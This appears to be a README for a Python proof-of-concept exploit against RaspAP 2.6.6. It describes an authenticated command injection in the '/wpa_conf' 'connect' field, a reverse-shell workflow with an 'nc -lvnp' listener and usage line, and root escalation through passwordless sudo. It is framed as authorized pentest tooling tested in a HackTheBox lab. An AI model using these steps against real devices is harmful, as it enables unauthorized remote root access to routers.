A working Python proof-of-concept for the authenticated remote code execution vulnerability in RaspAP 2.6.6.
| Field | Details |
|---|---|
| Software | RaspAP WebGUI |
| Affected Version | 2.6.6 |
| Vulnerability Type | Command Injection → Remote Code Execution |
| Authentication Required | HTTP Basic Auth |
| Original Author | Moritz Gruber (aware7.de) |
| CVE | N/A (referenced on ExploitDB) |
RaspAP passes the `connect` POST parameter from the `/wpa_conf` endpoint directly to `wpa_cli` without sanitization:
An attacker with valid credentials can inject a semicolon to terminate the `wpa_cli` argument and execute arbitrary shell commands. The web process runs as `www-data`, which on default RaspAP installs holds passwordless sudo rights, so the injected command runs with effective root privileges (run `sudo -l` from the shell you get to see exactly which commands the sudoers rule allows).
- Authenticate via HTTP Basic Auth
- GET /wpa_conf → extract CSRF token from
- POST /wpa_conf → inject payload into 'connect' field
- www-data executes reverse shell → catch with nc listener
```
pip install requests beautifulsoup4 lxml
python3 raspap_rce.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>
```

Example:

```
# Start listener first
nc -lvnp 1337
# Run exploit
python3 raspap_rce.py 10.3.141.1 80 admin secret 10.3.141.77 1337
```

- The original PoC by Moritz Gruber had a bug: the `HTTPBasicAuth` object was created but never mounted on the `requests.Session`, so every request went out unauthenticated and returned `401 Unauthorized`. This repo fixes that and adds proper error handling.
- A `ReadTimeout` on the POST request is expected and indicates success: the PHP handler is blocked while the injected reverse shell is running, so the HTTP response is never sent. Confirm by checking that your `nc` listener received a connection; a timeout alone only tells you the server accepted the request and did not answer.
- Tested against the HackTheBox WiFi Penetration Testing module lab environment.
This tool is intended for authorized penetration testing and security research only. Only use against systems you have explicit written permission to test. The author is not responsible for any misuse.